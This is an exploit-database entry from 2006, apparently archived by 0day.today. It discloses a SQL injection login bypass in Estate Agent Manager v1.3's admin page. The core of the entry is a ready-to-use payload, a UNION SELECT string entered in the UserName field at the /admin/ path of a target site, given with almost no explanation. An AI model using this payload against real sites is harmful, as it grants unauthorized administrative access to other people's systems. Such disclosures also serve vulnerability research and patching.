id: 1158
date: 11/13/2006
title: Estate Agent Manager <= v1.3 (default.asp) Login Bypass Vulnerability
author: ajann
cves: 

=====================================================================
Estate Agent Manager <= v1.3 (default.asp) Login Bypass Vulnerability
=====================================================================



*******************************************************************************
# Title  :  Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author :   ajann
*******************************************************************************
Example:

###http://[target]/[path]/admin/

UserName: ' union select 0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!



#  0day.today [2023-03-23]  #